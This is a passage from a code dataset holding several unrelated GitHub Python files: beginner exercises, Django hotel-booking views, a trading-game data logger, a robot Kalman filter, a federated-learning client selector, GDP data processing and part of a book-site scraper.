new_users:\n user.lower()\n if user in lowerList:\n print(f\"{user.lower()}, please enter a new username\")\n else:\n print(f\"{user}, username is avaliable\")\n","repo_name":"isaacj96/python_crash_course","sub_path":"chapter_five/Try_it_yourself/5-10_checking_users.py","file_name":"5-10_checking_users.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"262925673","text":"import argparse\n\nimport config\nfrom bulk_process_shots import bulk_process_shots\nfrom bulk_restore_backups import bulk_restore_backups\nfrom logs import log, set_level\n\n\ndef main():\n\tparser = argparse.ArgumentParser(description='Bulk processing of shots or restoring backups')\n\tparser.add_argument('-restore', '-r', action='store_true', help='Restore backups instead of processing shots')\n\tparser.add_argument('-shots', '-s', help='Path to SHOTS directory')\n\tparser.add_argument('-move_assets', '-a', action='store_true', help='Move assets to PLATES directory')\n\tparser.add_argument('-loglevel', '-l', help='Set the log level (DEBUG, INFO, WARNING, ERROR, CRITICAL)')\n\targs = parser.parse_args()\n\n\tshould_move_assets = args.move_assets or False\n\n\tif args.loglevel:\n\t\tconfig.log_level = args.loglevel\n\t\tset_level(args.loglevel)\n\n\tif args.shots:\n\t\tshots_dir_path = args.shots\n\t\tif args.restore:\n\t\t\tbulk_restore_backups(shots_dir_path)\n\t\telse:\n\t\t\tbulk_process_shots(shots_dir_path, should_move_assets)\n\telse:\n\t\tlog(\"Please provide a path to the SHOTS directory with -shots=PATH_TO_SHOTS\", 'ERROR')\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"olegkron/kfx_BulkRelativePaths","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3420033413","text":"from django.shortcuts import render\nfrom django import forms\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom .models import *\nfrom django.forms import ModelForm\nfrom django.contrib.auth.decorators import login_required\nimport datetime\n\ndef date_validator(value):\n if value < datetime.datetime.now().date():\n raise forms.ValidationError('invalid', code = 'invalid')\n \nclass SelectDateForm(forms.Form):\n\n def clean_date_out(self):\n date_in = self.data['date_in']\n date_out = self.data['date_out']\n if date_in > date_out:\n raise forms.ValidationError(\"Некоректная дата\")\n return date_out\n\n date_in = forms.DateField(label = 'Дата въезда', validators = [date_validator],error_messages = {'invalid' : 'Введите корректную дату'})\n date_out = forms.DateField(label = 'Дата выезда')\n\n@login_required(login_url = '/login/')\ndef recordView(request, id = None):\n if id == None:\n return HttpResponseRedirect('/records/')\n return render(request, 'record_view.html',{'record': Record.objects.get(pk = id)})\n \n@login_required(login_url = '/login/')\ndef listRecords(request):\n sql = '''SELECT *\n\tfrom management_record, management_room\n where\n management_record.room_id = management_room.id\n and (\n\t (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\n\tor\n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\t \n\tor \n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out <= %s)\n or\n (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out > %s and management_record.date_out <= %s))'''\n form = SelectDateForm(request.POST or None)\n form.fields['date_in'] = forms.DateField(label = 'Дата въезда')\n context = {'form': form}\n if request.method == 'POST' and form.is_valid():\n date_in = str(form.cleaned_data['date_in'])\n date_out = str(form.cleaned_data['date_out'])\n context['records'] = Record.objects.raw(sql,[date_in, date_out]*8)\n return render(request, 'list_records.html',context)\n\n@login_required(login_url = '/login/')\ndef listRooms(request):\n sql = \"\"\"\n SELECT \n management_room.number, management_room.id, management_tariff.name as tariff_name, management_tariff.units,\n management_valuta.name as valuta_name\n from \n management_room, management_tariff, management_valuta\n where\n management_room.tariff_id = management_tariff.id\n and\n management_room.id Not In\n (SELECT management_record.room_id \n\tfrom management_record \n where \n\t (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\n\tor\n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\t \n\tor \n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out <= %s)\n or\n (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out > %s and management_record.date_out <= %s))\n \"\"\"\n form = SelectDateForm(request.POST or None)\n context = {'form': form}\n if request.method == 'POST' and form.is_valid(): \n date_in = form.cleaned_data['date_in']\n date_out = form.cleaned_data['date_out']\n rooms = Room.objects.raw(sql,[str(date_in), str(date_out)]*8)\n context['form'] = form\n context['rooms'] = rooms\n context['date_in'] = str(date_in)\n context['date_out'] = str(date_out)\n else:\n context['rooms'] = None\n return render(request, 'list_rooms.html',context)\n\ndef check_dates(date_in, date_out):\n sql = '''SELECT \n count(management_room.id)\n from \n management_room\n where \n management_room.id Not In\n (SELECT management_record.room_id \n\tfrom management_record \n where \n\t (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\n\tor\n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\t \n\tor \n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out <= %s)\n or\n (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out <= %s))\n '''\n from django.db import connection, transaction\n cursor = connection.cursor()\n cursor.execute(sql, [date_in, date_out]*8)\n is_free = bool(cursor.fetchone()[0])\n return is_free\n\nclass RecordForm(ModelForm):\n\n def series_validator(value):\n if len(str(value)) != 4:\n raise forms.ValidationError('invalid', code = 'invalid')\n\n def passport_id_validator(value):\n if len(str(value)) != 6:\n raise forms.ValidationError('invalid', code = 'invalid')\n\n def clean_date_in(self):\n date_in = str(self.cleaned_data['date_in'])\n date_out = str(self.data['date_out'])\n print(date_in)\n if not check_dates(date_in, date_out):\n raise forms.ValidationError(\"В это время комната уже занята\")\n return date_in\n\n def clean_date_out(self):\n date_in = self.data['date_in']\n date_out = self.data['date_out']\n if date_in > date_out:\n raise forms.ValidationError(\"Некоректная дата\")\n return date_out\n \n\n passport_series = forms.IntegerField(label = 'Cерия паспорта', validators = [series_validator],error_messages = {'invalid' : 'Некоректная серия','required' : 'обязательное поле',})\n passport_id = forms.IntegerField(label = 'Номер паспорта', validators = [passport_id_validator],error_messages = {'invalid' : 'Некоректный номер пасспорта', 'required' : 'обязательное поле'})\n date_in = forms.DateField(label = 'дата въезда', validators = [date_validator], error_messages = {'invalid' : 'Некоректная дата'})\n\n class Meta:\n model = Record\n fields = ['first_name',\n 'middle_name',\n 'last_name',\n 'country',\n 'city',\n 'passport_series',\n 'passport_id',\n 'issued',\n 'date_of_birth',\n 'date_in',\n 'date_out',]\n \n@login_required(login_url = '/login/')\ndef record(request, id_room = None,date_in = None,date_out = None):\n if id_room == None:\n return HttpResponseRedirect('/rooms')\n room = Room.objects.get(pk = id_room)\n total = room.tariff.units\n record = Record(room = room, total = total,date_in = date_in, date_out = date_out)\n form = RecordForm(request.POST or None, instance = record)\n if request.method == 'POST' and form.is_valid():\n form.save()\n return render(request,'msg.html',{})\n return render(request, 'register.html', {'form' : form})\n\nclass PaymentForm(ModelForm):\n class Meta:\n model = Additional_payment\n fields = '__all__'\n\n@login_required(login_url = '/login/')\ndef add_payment(request):\n form = PaymentForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n record = form.cleaned_data['record']\n record.total += form.cleaned_data['service'].price * form.cleaned_data['size']\n record.save()\n form.save()\n return HttpResponse('Платеж добавлен')\n return render(request, 'add_payment.html', {'form' : form})\n\nclass BillForm(forms.Form):\n record = forms.ModelChoiceField(label = 'Клиент', queryset = Record.objects.all())\n \n@login_required(login_url = '/login/')\ndef bill(request):\n form = BillForm(request.GET or None)\n if request.method == 'GET' and form.is_valid():\n record = form.cleaned_data['record']\n payments = Additional_payment.objects.filter(record = record)\n total = record.total\n room_price = record.room.tariff.units\n return render(request, 'bill.html', {'room_price' : room_price,'form':form, 'total' : total, 'payments' : payments})\n return render(request,'bill.html',{'form':form})\n\n@login_required(login_url = '/login/')\ndef main(request):\n return render(request, 'main.html',{})\n\nfrom django.contrib.auth import logout\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/login/?next=/')\n \n \n \n \n \n\n","repo_name":"kirillherz/hotel-management-system","sub_path":"management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"34042896573","text":"import ctypes\nimport json\nimport os\nimport sys\nimport pandas as pd\npd.set_option('display.max_columns', None)\n\n# Root directory of the project\nROOT_DIR = os.path.abspath(\"./\")\nprint(ROOT_DIR+\"/rl_game/game\")\n\n# import game.so\nos.chdir(ROOT_DIR+\"/rl_game/game\")\nsoFile = \"./game.so\"\nexpso = ctypes.cdll.LoadLibrary(soFile)\n\ninfo_names = [\n \"Done\",\n \"LastPrice\",\n \"BidPrice1\",\n \"BidVolume1\",\n \"AskPrice1\",\n \"AskVolume1\",\n \"BidPrice2\",\n \"BidVolume2\",\n \"AskPrice2\",\n \"AskVolume2\",\n \"BidPrice3\",\n \"BidVolume3\",\n \"AskPrice3\",\n \"AskVolume3\",\n \"BidPrice4\",\n \"BidVolume4\",\n \"AskPrice4\",\n \"AskVolume4\",\n \"BidPrice5\",\n \"BidVolume5\",\n \"AskPrice5\",\n \"AskVolume5\",\n \"Volume\",\n \"HighestPrice\",\n \"LowestPrice\",\n \"TradingDay\",\n \"Target_Num\",\n \"Actual_Num\",\n \"AliveBidPrice1\",\n \"AliveBidVolume1\",\n \"AliveBidPrice2\",\n \"AliveBidVolume2\",\n \"AliveBidPrice3\",\n \"AliveBidVolume3\",\n \"AliveBidPriceNUM\",\n \"AliveBidVolumeNUM\",\n \"AliveAskPrice1\",\n \"AliveAskVolume1\",\n \"AliveAskPrice2\",\n \"AliveAskVolume2\",\n \"AliveAskPrice3\",\n \"AliveAskVolume3\",\n \"AliveAskPriceNUM\",\n \"AliveAskVolumeNUM\",\n \"score\",\n \"profit\",\n \"total_profit\",\n \"baseline_profit\",\n \"close_profit\",\n \"action\",\n]\n\narr_len = 100\narr1 = ctypes.c_int * arr_len\narr = ctypes.c_int * 1\n\nactions = arr1()\naction_len = arr()\ninfos = arr1()\ninfos_len = arr()\nrewards = arr1()\nrewards_len = arr()\n\nall_data = []\n\nfor start_day in range(1, 91):\n\n # day_data = []\n\n start_info = {\"date_index\": f\"{start_day} - {start_day}\", \"skip_steps\": 0}\n ctx = expso.CreateContext(json.dumps(start_info).encode())\n\n expso.GetInfo(ctx, infos, infos_len)\n expso.GetReward(ctx, rewards, rewards_len)\n\n step = 1\n action = 0\n while True:\n\n expso.GetInfo(ctx, infos, infos_len)\n expso.GetReward(ctx, rewards, rewards_len)\n\n info_dict = {}\n for i in range(44):\n info_dict[info_names[i]] = infos[i]\n for i in range(5):\n info_dict[info_names[i + 44]] = rewards[i]\n info_dict[info_names[48]] = action\n # print(info_dict)\n # day_data.append(info_dict)\n all_data.append(info_dict)\n\n done = infos[0]\n if done == 1:\n print(\"Day\", infos[25], \"data_len:\", step)\n # day_data_df = pd.DataFrame(day_data)\n # day_data_df.to_csv(ROOT_DIR + \"/r18-day\" + str(start_day) + \"-baseline_policy.csv\")\n # print(\"day\" + str(start_day) + \"data saved in \" + ROOT_DIR + \"/r18-day\" + str(\n # start_day) + \"-baseline_policy.csv\")\n expso.ReleaseContext(ctx)\n break\n\n target_num = infos[26]\n actual_num = infos[27]\n\n action = 0\n\n # if abs(actual_num - target_num) > 5:\n # if target_num > actual_num:\n # action = 6\n # else:\n # action = 9\n\n expso.Action(ctx, action)\n expso.Step(ctx)\n step += 1\nall_data_df = pd.DataFrame(all_data)\nprint(all_data_df.tail())\nprint(all_data_df.describe())\nall_data_df.to_csv(ROOT_DIR + \"/r18-all_data.csv\")\nprint(\"all_data saved in \" + ROOT_DIR + \"/r18-90days_data.csv\")\n","repo_name":"LiuShuai26/trading-game","sub_path":"game_data/savedata.py","file_name":"savedata.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73250595821","text":"from robot_simulation import UnscentedKalmanFilter\nfrom .model import Model\nfrom .receiver import Receiver\nimport numpy as np\nimport datetime\n\n# реализует управление роботом, подобно treerobot/test_robot.py\n# робот на примере подробно описан в том же файле\n\n\nclass GalileoRobot:\n Model = Model\n\n def __init__(self):\n self._filter = UnscentedKalmanFilter(GalileoRobot.Model)\n self._updated = False\n self._receiver = Receiver()\n\n def enabled(self):\n return True\n\n def paused(self):\n return not self._updated\n \n def stop(self):\n self._receiver.stop()\n\n def estimate(self):\n if not self.enabled():\n return\n\n self._updated, dt, self._posx, self._posy, self._speed, self._angle = self._receiver.update()\n\n if self._updated:\n self._last_updated_time = datetime.datetime.now()\n\n u, x_deviation = self._controlInput()\n self._filter.predict(dt, u, np.diag(x_deviation) ** 2)\n\n z, z_deviation = self._observeGNSS()\n xEst, PEst = self._filter.update(z, np.diag(z_deviation) ** 2)\n\n return dt, u, z, xEst, PEst\n else:\n return None\n \n def _controlInput(self):\n u = [0] * GalileoRobot.Model.usize\n u[GalileoRobot.Model.uspeed] = self._speed\n u[GalileoRobot.Model.uangle] = self._angle\n\n x_deviation = [0] * Model.xsize\n x_deviation[Model.xposx] = 0.93\n x_deviation[Model.xposy] = 2.04\n x_deviation[Model.xangle] = 2.862387\n x_deviation[Model.xspeed] = 0.5527557\n\n return u, x_deviation\n\n def _observeGNSS(self):\n z = [0] * GalileoRobot.Model.zsize\n z[GalileoRobot.Model.zposx] = self._posx\n z[GalileoRobot.Model.zposy] = self._posy\n\n z_deviation = [0] * Model.zsize\n z_deviation[Model.zposx] = 3\n z_deviation[Model.zposy] = 3\n\n return z, z_deviation\n","repo_name":"BinaryCat17/treerobot","sub_path":"tree_robot/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"39240826610","text":"\"\"\"\n HackerRank exercise\nGiven a string of lowercase letters in the range ascii[a-z], determine the index of\na character that can be removed to make the string a palindrome. There may be more than\none solution, but any will do. If the word is already a palindrome or there is no\nsolution, return -1. Otherwise, return the index of a character to remove.\n Example\ns = \"bcbc\nEither remove 'b' at index 0 or 'c' at index 3.\n\n Function Description\nComplete the palindromeIndex function in the editor below.\npalindromeIndex has the following parameter(s):\n - string s: a string to analyze\n Returns\nint: the index of the character to remove or -1\n Input Format\nThe first line contains an integer q, the number of queries.\nEach of the next q lines contains a query string s.\n\"\"\"\n\ndef palindromeIndex(s):\n if s == s[::-1]:\n return -1\n for i in range(len(s) // 2 + 1):\n if s[i] != s[len(s) - 1 - i]:\n p = s[:i] + s[i + 1:]\n p1 = s[:len(s) - 1 - i] + s[len(s) - i:]\n if p == p[::-1]:\n return i\n elif p1 == p1[::-1]:\n return len(s) - 1 - i\n return -1\n\n\nif __name__ == '__main__':\n print(3, palindromeIndex('aaab'))\n print(0, palindromeIndex('baa'))\n print(-1, palindromeIndex('aaa'))","repo_name":"swisskanton/hackerRankAndCodeWars","sub_path":"palindromeIndex.py","file_name":"palindromeIndex.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"6230827867","text":"import random\n\na = random.randint(1,10)\n\nguess = 0\ntries = 3\n\nwhile guess!=a:\n\t\n\tprint (f'you have {tries} tries')\n\tguess = int(input(\"guess: \"))\n\t\n\tif guess > a:\n\t\tprint ('too high')\n\telif guess < a:\n\t\tprint ('too low')\n\telse: \n\t\tprint(\"just right\")\n\t\tbreak\n\tif tries == 1:\n\t\tprint ('unfortunately, you lost')\n\t\tbreak\n\ttries-=1\n\t\n","repo_name":"DankoDmitry/university","sub_path":"Bio/sem1/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7059399186","text":"# pylint: disable = C0114, C0115, C0116, C0103\n\nimport pandas as pd\nfrom colorama import Fore\nfrom clientSelection.ClientSelection import ClientSelection\n\n\nclass ResourceClientSelection(ClientSelection):\n \"\"\"\n A class that inherits the client selection module, which selects clients\n according to the strength of their resources.\n\n ...\n\n Attributes\n ----------\n nodes : list\n The list of all nodes in the environment.\n K : float\n the percentage of the selection.\n debug_mode : bool\n Indicates if the debug mode is enabled or not.\n\n Methods\n -------\n resource_client_selection():\n Returns a list of clients selected according to their power ranking.\n\n \"\"\"\n\n # ? Select clients according to their resources. (The top ones with average power)\n def __init__(self, nodes: list, K: float = 0.1, debug_mode: bool = False):\n \"\"\"\n Constructs all the necessary attributes for the ResourceClientSelection object.\n\n Parameters\n ----------\n nodes : list\n The list of all nodes in the environment.\n K : float\n the percentage of the selection.\n debug_mode : bool, optional\n Indicates if the debug mode is enabled or not.\n\n \"\"\"\n super().__init__(nodes, debug_mode)\n self.K = K\n self.debug_mode = debug_mode\n\n def resource_client_selection(self) -> list:\n \"\"\"\n Return the list of the selected nodes according to their power.\n\n Parameters\n ----------\n\n\n Returns\n -------\n selected_clients (list): the list of the nodes.\n\n Examples\n --------\n >>> resourceClientSelection.resource_client_selection()\n\n \"\"\"\n print(f\"{Fore.LIGHTYELLOW_EX}[*] Starting client selection by resources\")\n selected_clients = []\n percentage = len(self.nodes) * self.K\n resource_df = pd.DataFrame()\n\n for node in self.nodes:\n # ? Collect the node's resources.\n rsrc_info = node.get_resources_information()\n name, cpu_power, cpu_usage, memory, memory_usage, total_storage, \\\n current_storage, battery_usage, total_energy, energy_consumption, current_energy, * \\\n data_length, date = rsrc_info\n\n data = {\"Node\": node, \"Name\": name, \"cpu_power\": cpu_power, \"cpu_usage\": cpu_usage,\n \"memory\": memory, \"memory_usage\": memory_usage, \"total_storage\": total_storage,\n \"current_storage\": current_storage, \"battery_usage\": battery_usage,\n \"total_energy\": total_energy, \"energy_consumption\": energy_consumption,\n \"current_energy\": current_energy, \"data_length\": data_length, \"Date\": date}\n # ? Put collected resources on DataFrame.\n resource_df = pd.concat([resource_df, pd.DataFrame.from_records([data])])\n\n resource_df['avg_power'] = resource_df[['total_energy', 'total_storage',\n 'cpu_power', 'memory']].mean(axis=1)\n # ? The top ones with average power\n selected_nodes = resource_df.nlargest(n=percentage, columns=['avg_power']).Node.values\n for client in selected_nodes:\n selected_clients.append(client)\n\n return selected_clients\n","repo_name":"mohamediniesta/CLiS-FL","sub_path":"clientSelection/ResourceClientSelection.py","file_name":"ResourceClientSelection.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"74595101115","text":"\"\"\"\nKrishna Panchapagesan, Mark Pock\nCSE 163 Final Project\n\nModifies the CSV containing the ratios between stock index points and their\n2010 prices to include a column for a weighted average based on GDP and\nmarket capitalisation.\n\"\"\"\n\nimport os\nimport pandas as pd\nfrom utils import web_tables, time_series\n\n\ndef generate_csvs(regions: dict):\n \"\"\"\n Given a dictionary regions containing the urls on MacroTrends for the\n gdps of certain regions as values for keys as the names of those regions,\n generates the csvs for them (and the csv for the US, whose data comes from\n a different site). Procedural, to be used only if csvs do not already\n exist or in the case of adding new regions from MacroTrends.\n \"\"\"\n curr_csvs = os.listdir('./datasets/gdps/')\n if not all((item + '.csv') in curr_csvs for item in regions.keys()):\n for region in regions:\n web_tables(regions[region], region, 'gdps/', (1, 2))\n regions['USA'] = 'https://www.thebalance.com/us-gdp-by-year-3305543'\n if 'USA.csv' not in curr_csvs:\n web_tables(regions['USA'], 'USA', 'gdps/')\n\n\ndef tril_to_bil(trillion: str) -> float:\n \"\"\"\n Given a str trillion representing the nominal GDP of the US in trillions of\n dollars as contained in the data from thebalance.com (in the form\n $num.num with occasional typing errors where the period is replaced by a\n comma), returns a float giving the billions of dollars corresponding to\n the amount.\n \"\"\"\n return 1000 * float(trillion.split('$')[1].replace(',', '.'))\n\n\ndef clean_bil(billion: str) -> float:\n \"\"\"\n Given a str billion representing the nominal GDP of a nation in billions of\n dollars as contained in the data from MacroTrends (in the form\n $num,num.numB, returns a float with the numerical amount isolated.\n \"\"\"\n return float(billion[1:-1].replace(',', ''))\n\n\ndef main():\n macrotrends = 'https://www.macrotrends.net/countries/'\n gdp = 'gdp-gross-domestic-product'\n regions = {'Europe': macrotrends + 'EUU/european-union/' + gdp,\n 'China': macrotrends + 'CHN/china/' + gdp,\n 'Japan': macrotrends + 'JPN/japan/' + gdp}\n generate_csvs(regions)\n places = list(regions.keys())\n\n reg_dfs = [time_series(reg, 'gdps/', 'Year') for reg in regions]\n nomgdp = reg_dfs[-1]['USA Nominal GDP (trillions)']\n reg_dfs[-1].loc[:, 'USA GDP'] = nomgdp.apply(tril_to_bil)\n\n for i in range(len(reg_dfs) - 1):\n currgdp = reg_dfs[i].loc[:, places[i] + ' GDP']\n reg_dfs[i].loc[:, places[i] + ' GDP'] = currgdp.apply(clean_bil)\n\n gdp_series = [reg_dfs[i][places[i] + ' GDP'] for i in range(len(regions))]\n df = pd.DataFrame(gdp_series[0])\n for series in gdp_series[1:]:\n df = df.join(series, how='outer')\n df.columns = [col.split()[0] for col in df.columns]\n df.index.name = 'Date'\n df.to_csv('./datasets/gdps/pared.csv')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"krishna-panchap/163-Final-Project","sub_path":"process_gdps.py","file_name":"process_gdps.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26759124654","text":"import numpy as np \nimport pandas as pd \nimport csv\n\n\ndef addrow(full_band_dict, object_id, mjd, wfile):\n\tnew_row = [object_id, int(mjd)]\n\tfor band in ['u','g','r','i','z','y']:\n\t\tif band not in full_band_dict:\n\t\t\tnew_row += [None, None]\n\t\telse:\n\t\t\tnew_row += full_band_dict[band]\n\twfile.writerow(new_row)\n\t# print(new_row)\n\ndata = pd.read_csv('../code/rawdata/test_set_batch2.csv') #csv file need to be converted\nmeta = pd.read_csv('../code/rawdata/unblinded_test_set_metadata.csv') # metadata\n\n\nmeta = meta[(meta['ddf']<1)&(meta['target']==88)]\nWDF_obj = meta.groupby('object_id')['object_id'].apply(list)\n\nfile = open('preprocessed_data/test_converted_AGN.csv','w')\n\nwfile = csv.writer(file)\nwfile.writerow(['id','mjd','u','u_err','g','g_err','r','r_err','i','i_err','z','z_err','y','y_err'])\nband_dict = {0:'u',1:'g',2:'r',3:'i',4:'z',5:'y'}\nlast_id = None\nlast_mjd = None\nfull_band_dict = {}\nn = 0\ncheck = 0\nwhile n < len(data):\n\tif data['object_id'][n] in WDF_obj:\n\t\tif data['object_id'][n]==last_id:\n\t\t\tdelta_mjd = data['mjd'][n] - last_mjd\n\t\t\tif delta_mjd >=0.5:\n\t\t\t\taddrow(full_band_dict, last_id, last_mjd, wfile)\n\t\t\t\tfull_band_dict = {}\n\t\t\t\tlast_mjd = data['mjd'][n]\n\t\t\tif band_dict[data['passband'][n]] not in full_band_dict:\n\t\t\t\tfull_band_dict[band_dict[data['passband'][n]]] = [data['flux'][n],data['flux_err'][n]]\n\t\telse:\n\t\t\tif last_id != None and last_mjd != None:\n\t\t\t\taddrow(full_band_dict, last_id, last_mjd, wfile)\n\t\t\tlast_id = data['object_id'][n]\n\t\t\tlast_mjd = data['mjd'][n]\n\t\t\tprint(last_id)\n\t\t\tcheck +=1\n\t\t\tn -=1\n\n\tn +=1\n\nprint('check:', check)\nprint('test num:', len(WDF_obj))\n\n\n\n","repo_name":"XinyueSheng2019/QuasarClassifier","sub_path":"data/lsst/preprocess/convert_band.py","file_name":"convert_band.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10626546267","text":"from doubly_linked_base import PositionalList\n\nclass FavouritesList:\n \"\"\"List of elements ordered from most frequently accessed to least\"\"\"\n \"\"\"Using a PositionalList\"\"\"\n\n #-----------nested _Item class----------------\n class _Item:\n __slots__ = '_value', '_count' #streamline memory usage\n def __init__(self, element):\n self._value = element #user's element\n self._count = 0 #access count init zero\n\n #-----------nonpublic utilities---------------\n def _find_position(self, e):\n \"\"\"Search for element e and return its position (or None if not found)\"\"\"\n walk = self._data.first();\n while walk is not None and walk.element()._value != e:\n walk = self._data.after(walk)\n return walk\n\n def _move_up(self, p):\n \"\"\"Move item at Position p earlier in the list based on access count\"\"\"\n if p != self._data.first():\n cnt = p.element()._count\n walk = self._data.before(p)\n if cnt > walk.element()._count:\n while (walk != self._data.first() and\n cnt > self._data.before(walk).element()._count):\n walk = self._data.before(walk)\n self._data.add_before(walk, self._data.delete(p)) #delete/reinsert\n\n def __init__(self):\n \"\"\"Create empty list of favourites\"\"\"\n self._data = PositionalList() #list of _Item instances\n\n def __len__(self):\n \"\"\"Return number of entries on fav list\"\"\"\n return len(self._data)\n\n def is_empty(self):\n \"\"\"Return True if list is empty.\"\"\"\n return len(self._data) == 0\n\n def access(self, e):\n \"\"\"Access element e, thereby increasing its access count\"\"\"\n p = self._find_position(e)\n if p is None:\n p = self._data.add_last(self._Item(e))\n p.element()._count += 1\n self._move_up(p) #consider moving forward\n\n def remove(self, e):\n \"\"\"Remove element e from list of favs\"\"\"\n p = self._find_position(e)\n if p is not None:\n self._data.delete(p)\n\n def top(self, k):\n \"\"\"Generate sequence of top k elements in terms of access count\"\"\"\n if not 1 <= k <= len(self):\n raise ValueError('Illegal value for k')\n walk = self._data.first()\n for j in range(k):\n item = walk.element()\n yield item._value\n walk = self._data.after(walk)\n\n\ntheList = PositionalList()\na = theList.add_first('4')\nb = theList.add_after(a, '2')\nc = theList.add_after(b, '1')\n\nfavList = FavouritesList()\nfavList.access('1')\nfavList.access('2')\nfavList.access('3')\nfavList.access('1')\nfavList.access('1')\nfavList.access('3')\ntheList = list(favList.top(3))\nfor thing in theList:\n print(thing)","repo_name":"snozza/algorithms_structures","sub_path":"src/favourites_list.py","file_name":"favourites_list.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30635056880","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nimport json\nfrom basic_functions import *\n\ndef get_pages_youdu():\n ''' a function that gets the page urls\n\n This function gets the urls of the main pages which list the books\n\n Parameters\n ----------\n None \n\n Returns\n -------\n pages_youdu: list\n a list of main page urls\n '''\n\n baseurl = \"https://www.youdubook.com\"\n listurl = '/booklibrary/index/str/0_0_0_0_0_2_0'\n url = baseurl + listurl\n pages_youdu = []\n for i in range(1,9): # there are page 1-8\n page_url = url + '?page=' + str(i)\n pages_youdu.append(page_url) \n return pages_youdu\n \ndef get_books_youdu(page_url):\n ''' a function that gets the books' infos on one main page\n\n Parameters\n ----------\n page_url: string\n the url of the main page \n\n Returns\n -------\n booklist: list\n a list of the retrived book\n '''\n\n cache_flag = 0\n if os.path.exists('cache.json'):\n cache = cache_read()\n if page_url in cache:\n print(\"Using cache\")\n page_info = cache[page_url]\n cache_flag = 1\n if cache_flag == 0:\n print('Fetching')\n headers = {'User-Agent': 'UMSI 507 Course Project',\n 'From': 'yuanfenw@umich.edu',\n 'Course-Info': 'https://www.si.umich.edu/programs/courses/507'}\n response = requests.get(page_url, headers=headers)\n page_info = response.text\n cache_save('cache.json', page_url, page_info)\n\n soup = BeautifulSoup(page_info, 'html.parser')\n # Get the book_list_parent\n book_list_parent = soup.find('div', class_='BooklibraryList').find('ul')\n ## loop through the child divs\n book_listing = book_list_parent.find_all('li', recursive=False)\n\n count = 0\n flag = 0\n booklist = []\n for book in book_listing:\n ### extract book details url\n if flag == 1:\n flag = 0\n count += 1\n if count % 10 == 0:\n print(f'Now retrieving book {count}')\n if count == 32:\n break\n continue\n flag = 1\n temp = book.find('span', recursive=False)\n book_header = temp.find('a').text\n book_href = temp.find('a')['href']\n book = get_bookdetail_youdu(book_href)\n booklist.append(book)\n return booklist\n\ndef get_bookdetail_youdu(book_url):\n ''' a function that gets the book infos \n\n Parameters\n ----------\n book_url: string\n the url of the book page \n\n Returns\n -------\n book: Book\n a book instance with retrived infos\n '''\n\n cache_flag = 0\n if os.path.exists('cache.json'):\n cache = cache_read()\n if book_url in cache:\n print(\"Using cache\")\n html_page = cache[book_url]\n cache_flag = 1\n if cache_flag == 0:\n print(\"Fetching\")\n headers = {'User-Agent': 'UMSI 507 Course Project',\n 'From': 'yuanfenw@umich.edu',\n 'Course-Info': 'https://www.si.umich.edu/programs/courses/507'}\n response = requests.get(book_url, headers=headers)\n html_page = response.text\n cache_save('cache.json', book_url, html_page)\n\n soup_detail = BeautifulSoup(html_page, 'html.parser')\n ## extract book details\n book_label_temp = soup_detail.find('div', class_='label').find('ul').find_all('li', class_='')\n if len(book_label_temp) == 0:\n book_label = 'No category'\n else:\n book_label = book_label_temp[0].text\n book_size = soup_detail.find('div', class_='Font').find_all('span')[0].text\n book_description = soup_detail.find('div', class_='synopsisCon').text.strip()\n book_title = soup_detail.find('div', class_='title')\n book_name = book_title.find('span').text.strip()\n book_date = book_title.find('i').text.split(' ')[0][-10:]\n book_like = soup_detail.find('li', class_='TouRecommendedVotes').text\n book_like = book_like.split('чеи')[1]\n book = Book(book_label, 